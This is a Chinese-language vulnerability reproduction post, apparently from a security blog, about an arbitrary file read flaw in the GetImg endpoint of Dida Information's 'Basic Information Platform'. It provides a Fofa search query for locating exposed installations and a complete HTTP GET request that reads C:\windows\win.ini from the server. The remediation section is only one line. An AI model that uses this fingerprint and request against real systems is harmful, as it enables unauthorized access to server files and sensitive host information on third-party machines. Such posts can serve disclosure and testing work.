地大信息-基础信息平台 GetImg 任意文件读取漏洞复现

0x01 漏洞描述:

武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。

旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。

0x02 搜索语句:

Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"

0x03 漏洞复现:

复制代码
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

0x04 修复建议:

厂商已发布补丁 请及时修复

相关推荐
运维开发王义杰25 分钟前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习2 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
加密狗复制模拟4 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
galaxylove5 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu5 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司5 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
小能喵7 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux
浩浩测试一下12 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA15 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
网安小白的进阶之路17 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全